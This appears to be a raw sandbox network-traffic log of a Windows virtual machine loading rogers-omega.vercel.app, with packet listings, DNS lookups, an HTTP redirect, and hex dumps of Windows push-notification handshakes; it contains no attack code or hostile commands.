                                                      Sep 29, 2024 07:50:36.599354982 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.599421978 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.599467993 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.599467993 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.599509954 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.600347996 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.600392103 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.600425959 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.600440979 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.600475073 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.600505114 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.602164030 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.602207899 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.602237940 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.602264881 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.602298021 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.602313042 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.603965998 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.604007959 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.604027987 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.604046106 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.604068995 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.604085922 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.604836941 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.604902983 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.604943991 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.604943991 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.604959011 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.605005980 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.605072975 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.605125904 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.608663082 CEST49748443192.168.2.676.76.21.241
                                                      Sep 29, 2024 07:50:36.608694077 CEST4434974876.76.21.241192.168.2.6
                                                      Sep 29, 2024 07:50:36.734533072 CEST44349749184.28.90.27192.168.2.6
                                                      Sep 29, 2024 07:50:36.734636068 CEST49749443192.168.2.6184.28.90.27
                                                      Sep 29, 2024 07:50:36.742790937 CEST49749443192.168.2.6184.28.90.27
                                                      Sep 29, 2024 07:50:36.742803097 CEST44349749184.28.90.27192.168.2.6
                                                      Sep 29, 2024 07:50:36.743202925 CEST44349749184.28.90.27192.168.2.6
                                                      Sep 29, 2024 07:50:36.749797106 CEST49749443192.168.2.6184.28.90.27
                                                      Sep 29, 2024 07:50:36.795427084 CEST44349749184.28.90.27192.168.2.6
                                                      Sep 29, 2024 07:50:37.011370897 CEST44349749184.28.90.27192.168.2.6
                                                      Sep 29, 2024 07:50:37.011591911 CEST44349749184.28.90.27192.168.2.6
                                                      Sep 29, 2024 07:50:37.011646986 CEST49749443192.168.2.6184.28.90.27
                                                      Sep 29, 2024 07:50:37.012635946 CEST49749443192.168.2.6184.28.90.27
                                                      Sep 29, 2024 07:50:37.012665987 CEST44349749184.28.90.27192.168.2.6
                                                      Sep 29, 2024 07:50:37.012676954 CEST49749443192.168.2.6184.28.90.27
                                                      Sep 29, 2024 07:50:37.012682915 CEST44349749184.28.90.27192.168.2.6
                                                      Sep 29, 2024 07:50:43.551367044 CEST44349729142.250.185.132192.168.2.6
                                                      Sep 29, 2024 07:50:43.551440954 CEST44349729142.250.185.132192.168.2.6
                                                      Sep 29, 2024 07:50:43.551647902 CEST49729443192.168.2.6142.250.185.132
                                                      Sep 29, 2024 07:50:43.952189922 CEST49729443192.168.2.6142.250.185.132
                                                      Sep 29, 2024 07:50:43.952233076 CEST44349729142.250.185.132192.168.2.6
                                                      Sep 29, 2024 07:50:58.545531988 CEST49753443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:50:58.545599937 CEST4434975340.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:50:58.545681000 CEST49753443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:50:58.546425104 CEST49753443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:50:58.546442986 CEST4434975340.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:50:59.330509901 CEST4434975340.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:50:59.330588102 CEST49753443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:50:59.373425007 CEST49753443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:50:59.373492956 CEST4434975340.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:50:59.374442101 CEST4434975340.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:50:59.377032995 CEST49753443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:50:59.377109051 CEST49753443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:50:59.377121925 CEST4434975340.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:50:59.377227068 CEST49753443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:50:59.423408031 CEST4434975340.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:50:59.551435947 CEST4434975340.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:50:59.551539898 CEST4434975340.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:50:59.551655054 CEST49753443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:50:59.566315889 CEST49753443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:50:59.566368103 CEST4434975340.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:51:01.166055918 CEST804971776.76.21.123192.168.2.6
                                                      Sep 29, 2024 07:51:01.167411089 CEST4971780192.168.2.676.76.21.123
                                                      Sep 29, 2024 07:51:01.851032019 CEST4971780192.168.2.676.76.21.123
                                                      Sep 29, 2024 07:51:01.855911016 CEST804971776.76.21.123192.168.2.6
                                                      Sep 29, 2024 07:51:33.030205011 CEST49756443192.168.2.6142.250.185.132
                                                      Sep 29, 2024 07:51:33.030247927 CEST44349756142.250.185.132192.168.2.6
                                                      Sep 29, 2024 07:51:33.030338049 CEST49756443192.168.2.6142.250.185.132
                                                      Sep 29, 2024 07:51:33.030569077 CEST49756443192.168.2.6142.250.185.132
                                                      Sep 29, 2024 07:51:33.030580997 CEST44349756142.250.185.132192.168.2.6
                                                      Sep 29, 2024 07:51:33.615932941 CEST49757443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:51:33.615983009 CEST4434975740.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:51:33.616055012 CEST49757443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:51:33.616677046 CEST49757443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:51:33.616692066 CEST4434975740.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:51:33.696418047 CEST44349756142.250.185.132192.168.2.6
                                                      Sep 29, 2024 07:51:33.696767092 CEST49756443192.168.2.6142.250.185.132
                                                      Sep 29, 2024 07:51:33.696796894 CEST44349756142.250.185.132192.168.2.6
                                                      Sep 29, 2024 07:51:33.697134018 CEST44349756142.250.185.132192.168.2.6
                                                      Sep 29, 2024 07:51:33.697559118 CEST49756443192.168.2.6142.250.185.132
                                                      Sep 29, 2024 07:51:33.697623968 CEST44349756142.250.185.132192.168.2.6
                                                      Sep 29, 2024 07:51:33.747452974 CEST49756443192.168.2.6142.250.185.132
                                                      Sep 29, 2024 07:51:34.416953087 CEST4434975740.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:51:34.417375088 CEST49757443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:51:34.418766975 CEST49757443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:51:34.418777943 CEST4434975740.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:51:34.418994904 CEST4434975740.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:51:34.420898914 CEST49757443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:51:34.420898914 CEST49757443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:51:34.420917034 CEST4434975740.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:51:34.421140909 CEST49757443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:51:34.467396975 CEST4434975740.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:51:34.597806931 CEST4434975740.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:51:34.598015070 CEST4434975740.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:51:34.598370075 CEST49757443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:51:34.599638939 CEST49757443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:51:34.599638939 CEST49757443192.168.2.640.115.3.253
                                                      Sep 29, 2024 07:51:34.599658012 CEST4434975740.115.3.253192.168.2.6
                                                      Sep 29, 2024 07:51:43.600514889 CEST44349756142.250.185.132192.168.2.6
                                                      Sep 29, 2024 07:51:43.600579977 CEST44349756142.250.185.132192.168.2.6
                                                      Sep 29, 2024 07:51:43.600722075 CEST49756443192.168.2.6142.250.185.132
                                                      Sep 29, 2024 07:51:43.856745958 CEST49756443192.168.2.6142.250.185.132
                                                      Sep 29, 2024 07:51:43.856782913 CEST44349756142.250.185.132192.168.2.6
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 29, 2024 07:50:29.657886982 CEST53569591.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:29.681901932 CEST53514621.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:30.720813036 CEST53585851.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:30.760885954 CEST5626653192.168.2.61.1.1.1
                                                      Sep 29, 2024 07:50:30.764281988 CEST6258753192.168.2.61.1.1.1
                                                      Sep 29, 2024 07:50:30.769815922 CEST53562661.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:30.772758961 CEST53625871.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:31.238559961 CEST6012053192.168.2.61.1.1.1
                                                      Sep 29, 2024 07:50:31.238616943 CEST5367953192.168.2.61.1.1.1
                                                      Sep 29, 2024 07:50:31.247286081 CEST53601201.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:31.248786926 CEST53536791.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:31.974250078 CEST6286553192.168.2.61.1.1.1
                                                      Sep 29, 2024 07:50:31.974376917 CEST6426553192.168.2.61.1.1.1
                                                      Sep 29, 2024 07:50:31.980634928 CEST53610991.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:31.980798960 CEST53628651.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:31.981374025 CEST53642651.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:32.981614113 CEST5157153192.168.2.61.1.1.1
                                                      Sep 29, 2024 07:50:32.981842041 CEST5770753192.168.2.61.1.1.1
                                                      Sep 29, 2024 07:50:32.988213062 CEST53515711.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:32.988311052 CEST53577071.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:32.995066881 CEST5330753192.168.2.61.1.1.1
                                                      Sep 29, 2024 07:50:32.995616913 CEST5277353192.168.2.61.1.1.1
                                                      Sep 29, 2024 07:50:33.003324032 CEST53533071.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:33.004081964 CEST53527731.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:33.013838053 CEST5554953192.168.2.61.1.1.1
                                                      Sep 29, 2024 07:50:33.014306068 CEST5487553192.168.2.61.1.1.1
                                                      Sep 29, 2024 07:50:33.020581961 CEST53555491.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:33.022098064 CEST53548751.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:34.496777058 CEST53630771.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:50:48.011661053 CEST53523301.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:51:07.462948084 CEST53641001.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:51:28.688870907 CEST53565651.1.1.1192.168.2.6
                                                      Sep 29, 2024 07:51:30.599893093 CEST53556251.1.1.1192.168.2.6
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Sep 29, 2024 07:50:30.760885954 CEST192.168.2.61.1.1.10x2251Standard query (0)rogers-omega.vercel.appA (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:30.764281988 CEST192.168.2.61.1.1.10xcea3Standard query (0)rogers-omega.vercel.app65IN (0x0001)false
                                                      Sep 29, 2024 07:50:31.238559961 CEST192.168.2.61.1.1.10xdc24Standard query (0)rogers-omega.vercel.appA (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:31.238616943 CEST192.168.2.61.1.1.10xa446Standard query (0)rogers-omega.vercel.app65IN (0x0001)false
                                                      Sep 29, 2024 07:50:31.974250078 CEST192.168.2.61.1.1.10x26cdStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:31.974376917 CEST192.168.2.61.1.1.10x3d7bStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                      Sep 29, 2024 07:50:32.981614113 CEST192.168.2.61.1.1.10x722cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:32.981842041 CEST192.168.2.61.1.1.10x5233Standard query (0)www.google.com65IN (0x0001)false
                                                      Sep 29, 2024 07:50:32.995066881 CEST192.168.2.61.1.1.10xb1d3Standard query (0)rogers-omega.vercel.appA (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:32.995616913 CEST192.168.2.61.1.1.10xc4c5Standard query (0)rogers-omega.vercel.app65IN (0x0001)false
                                                      Sep 29, 2024 07:50:33.013838053 CEST192.168.2.61.1.1.10x15c4Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:33.014306068 CEST192.168.2.61.1.1.10x2783Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Sep 29, 2024 07:50:30.769815922 CEST1.1.1.1192.168.2.60x2251No error (0)rogers-omega.vercel.app76.76.21.123A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:30.769815922 CEST1.1.1.1192.168.2.60x2251No error (0)rogers-omega.vercel.app76.76.21.241A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:31.247286081 CEST1.1.1.1192.168.2.60xdc24No error (0)rogers-omega.vercel.app76.76.21.164A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:31.247286081 CEST1.1.1.1192.168.2.60xdc24No error (0)rogers-omega.vercel.app76.76.21.9A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:31.980798960 CEST1.1.1.1192.168.2.60x26cdNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                      Sep 29, 2024 07:50:31.980798960 CEST1.1.1.1192.168.2.60x26cdNo error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:31.980798960 CEST1.1.1.1192.168.2.60x26cdNo error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:31.980798960 CEST1.1.1.1192.168.2.60x26cdNo error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:31.980798960 CEST1.1.1.1192.168.2.60x26cdNo error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:31.981374025 CEST1.1.1.1192.168.2.60x3d7bNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                      Sep 29, 2024 07:50:32.988213062 CEST1.1.1.1192.168.2.60x722cNo error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:32.988311052 CEST1.1.1.1192.168.2.60x5233No error (0)www.google.com65IN (0x0001)false
                                                      Sep 29, 2024 07:50:33.003324032 CEST1.1.1.1192.168.2.60xb1d3No error (0)rogers-omega.vercel.app76.76.21.241A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:33.003324032 CEST1.1.1.1192.168.2.60xb1d3No error (0)rogers-omega.vercel.app76.76.21.61A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:33.020581961 CEST1.1.1.1192.168.2.60x15c4No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                      Sep 29, 2024 07:50:33.020581961 CEST1.1.1.1192.168.2.60x15c4No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:33.020581961 CEST1.1.1.1192.168.2.60x15c4No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:33.020581961 CEST1.1.1.1192.168.2.60x15c4No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:33.020581961 CEST1.1.1.1192.168.2.60x15c4No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                      Sep 29, 2024 07:50:33.022098064 CEST1.1.1.1192.168.2.60x2783No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                      Sep 29, 2024 07:50:40.632632017 CEST1.1.1.1192.168.2.60x2b80No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Sep 29, 2024 07:50:40.632632017 CEST1.1.1.1192.168.2.60x2b80No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                      • rogers-omega.vercel.app
                                                      • https:
                                                        • cdn.jsdelivr.net
                                                      • fs.microsoft.com
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.64971676.76.21.123804420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 29, 2024 07:50:30.779268026 CEST438OUTGET / HTTP/1.1
                                                      Host: rogers-omega.vercel.app
                                                      Connection: keep-alive
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Sep 29, 2024 07:50:31.234481096 CEST184INHTTP/1.0 308 Permanent Redirect
                                                      Content-Type: text/plain
                                                      Location: https://rogers-omega.vercel.app/
                                                      Refresh: 0;url=https://rogers-omega.vercel.app/
                                                      server: Vercel
                                                      Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e
                                                      Data Ascii: Redirecting...


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      0192.168.2.64970940.115.3.253443
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:29 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 2b 7a 6b 71 72 7a 64 71 4c 55 43 6f 47 71 34 34 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 33 66 66 32 37 64 35 63 37 62 34 38 65 39 62 0d 0a 0d 0a
                                                      Data Ascii: CNT 1 CON 305MS-CV: +zkqrzdqLUCoGq44.1Context: d3ff27d5c7b48e9b
                                                      2024-09-29 05:50:29 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                      2024-09-29 05:50:29 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 2b 7a 6b 71 72 7a 64 71 4c 55 43 6f 47 71 34 34 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 33 66 66 32 37 64 35 63 37 62 34 38 65 39 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 7a 55 45 6b 33 4e 66 59 68 39 44 37 4a 45 5a 56 62 6c 51 70 7a 62 55 68 49 35 31 6e 4c 71 31 6c 79 78 73 49 65 70 6c 50 58 6f 72 4f 79 52 49 56 48 6e 75 53 2b 51 69 6e 32 63 6a 51 38 47 78 6c 52 66 65 2f 66 72 53 38 6e 4e 35 33 45 6b 50 56 49 67 5a 54 76 4c 63 7a 43 74 4b 2f 74 4b 78 6b 4e 6c 45 66 39 33 48 61 4b 43 39 4b
                                                      Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: +zkqrzdqLUCoGq44.2Context: d3ff27d5c7b48e9b<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXzUEk3NfYh9D7JEZVblQpzbUhI51nLq1lyxsIeplPXorOyRIVHnuS+Qin2cjQ8GxlRfe/frS8nN53EkPVIgZTvLczCtK/tKxkNlEf93HaKC9K
                                                      2024-09-29 05:50:29 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 2b 7a 6b 71 72 7a 64 71 4c 55 43 6f 47 71 34 34 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 33 66 66 32 37 64 35 63 37 62 34 38 65 39 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: +zkqrzdqLUCoGq44.3Context: d3ff27d5c7b48e9b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                      2024-09-29 05:50:29 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                      Data Ascii: 202 1 CON 58
                                                      2024-09-29 05:50:29 UTC58INData Raw: 4d 53 2d 43 56 3a 20 51 41 55 53 2f 74 74 4f 48 55 53 47 66 45 77 46 31 78 35 57 2b 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                      Data Ascii: MS-CV: QAUS/ttOHUSGfEwF1x5W+g.0Payload parsing failed.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1192.168.2.64971340.115.3.253443
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:30 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 36 57 64 57 71 36 33 4e 57 45 47 34 2f 32 51 64 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 66 37 37 38 39 35 38 32 62 64 38 36 65 36 35 0d 0a 0d 0a
                                                      Data Ascii: CNT 1 CON 305MS-CV: 6WdWq63NWEG4/2Qd.1Context: 4f7789582bd86e65
                                                      2024-09-29 05:50:30 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                      2024-09-29 05:50:30 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 36 57 64 57 71 36 33 4e 57 45 47 34 2f 32 51 64 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 66 37 37 38 39 35 38 32 62 64 38 36 65 36 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 66 43 7a 2f 42 6a 43 32 68 5a 41 37 6c 74 4e 61 6e 34 59 53 67 63 39 70 56 36 51 6b 76 57 59 33 63 52 6b 5a 58 37 6a 4c 4b 69 53 75 41 71 33 2f 69 2b 2b 45 47 58 7a 38 45 79 64 75 73 36 31 78 72 50 67 6b 38 6b 56 35 5a 67 52 31 54 54 66 4c 66 66 71 79 62 72 5a 34 64 61 6a 39 49 6b 6b 38 59 50 47 71 51 39 4e 66 6d 39 6f 41 69
